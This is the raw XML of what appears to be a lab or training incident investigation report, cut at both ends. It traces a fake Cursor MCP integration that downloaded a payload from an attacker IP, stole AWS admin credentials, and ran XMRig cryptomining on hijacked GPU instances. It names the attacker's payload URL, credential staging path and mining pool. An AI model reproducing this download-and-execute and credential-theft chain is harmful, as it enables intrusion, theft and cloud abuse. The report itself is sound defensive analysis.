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0"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY OPERATIONS CENTER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7365d"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INCIDENT INVESTIGATION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1f4e79"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious Cursor MCP Integration → AWS Credential Theft → Cloud Cryptomining</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06">
            <w:pPr>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7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident / Lab</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CursorJack</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9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Incident Date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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20–21 April 2026 (UTC)</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B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Platforms</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows workstation, Cursor IDE, AWS, Solana</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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Analyst</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Johann Weingertner</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F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Report Date</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">20 July 2026</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1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidential — Training / Lab Investigation</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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">High-confidence reconstruction based on endpoint artifacts, browser history, Cursor MCP configuration, Sysmon events, AWS CloudTrail records, recovered mining script, and blockchain evidence.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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The investigation identified a multi-stage compromise initiated when a backend developer searched for a Cursor Model Context Protocol (MCP) integration and visited the fraudulent website awesomeawsmcp.com. The site led to installation of an MCP server named “AWS dev ops.” Its configuration embedded a command that downloaded and executed s.exe from attacker infrastructure at 3.72.63.40.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload established command-and-control, then staged the victim’s AWS credential directory in C:\Users\Administrator\.exfil\. The stolen IAM credentials belonged to arn:aws:iam::990227772331:user/admin. From source IP 3.72.63.40, the actor launched 16 p3.2xlarge EC2 instances across four AWS regions, tagged them prod-web-server, and deployed an XMRig-based miner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The recovered miner configuration connected to rx.unmineable.com:3333 and credited a Solana wallet. Blockchain investigation showed that the wallet was flagged as “Drift Exploiter 1” and received 45,292.208963921 dSOL from the Drift Vault. This demonstrates endpoint compromise, cloud credential theft, large-scale unauthorized compute deployment, cryptomining, and linkage to a separately flagged DeFi exploit wallet.</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7"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="cente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Confidence</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="cente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7"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Impact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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</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Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromised privileged AWS credentials; 16 unauthorized GPU instances; cryptomining and potential financial loss</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Key determinations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Initial access originated from a malicious MCP integration advertised as an AWS automation tool.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endpoint payload was downloaded from http://3.72.63.40:80/payload/s.exe and executed through Cursor’s MCP configuration.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AWS credentials were copied to C:\Users\Administrator\.exfil\ before cloud abuse began.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compromised IAM user was admin in AWS account 990227772331.</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CloudTrail recorded 16 RunInstances operations across ap-southeast-1, us-east-1, eu-west-1, and us-west-2.</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mining script used XMRig 6.26.0 and the unMineable RandomX pool on TCP/3333.</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Solana wallet was publicly labeled Drift Exploiter 1 and received 45,292.208963921 dSOL from Drift Vault.</w:t>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Attack Timeline Overview</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1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">UTC Time</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigative finding</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2E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 20:57</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Victim browsed to http://awesomeawsmcp.com/.</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1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Shortly after</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cursor MCP server “AWS dev ops” installed with embedded curl command.</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4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 20:58:11</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">curl.exe downloaded s.exe from 3.72.63.40:80.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7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 20:58:42</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload executed; first observed C2 command was pwd.</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A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-20 21:03:07</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS credentials copied into C:\Users\Administrator\.exfil\.</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D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-21 10:15:22 onward</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker used stolen admin credentials from 3.72.63.40.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40">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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41">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2026-04-21 10:15–11:00+</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">16 p3.2xlarge instances launched across four AWS regions.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43">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-launch</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XMRig configured for rx.unmineable.com:3333 using attacker Solana wallet.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46">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>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047">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Blockchain review</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Wallet linked to Drift Protocol exploit and 45,292.208963921 dSOL transfer.</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3. Initial Access: Malicious Website</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Browser History Examination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: The Chromium/Edge History SQLite database was opened in DB Browser for SQLite. The urls table was reviewed for browsing activity immediately before execution. The final relevant row contained the title “AWS dev ops,” URL http://awesomeawsmcp.com/, and a Chromium timestamp in last_visit_time.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4E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence field</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f4e79" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">URL</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://awesomeawsmcp.com/</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2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Page title</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Fonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AWS dev ops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4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Visit count</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Typed count</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rFonts w:ascii="Aptos" w:cs="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
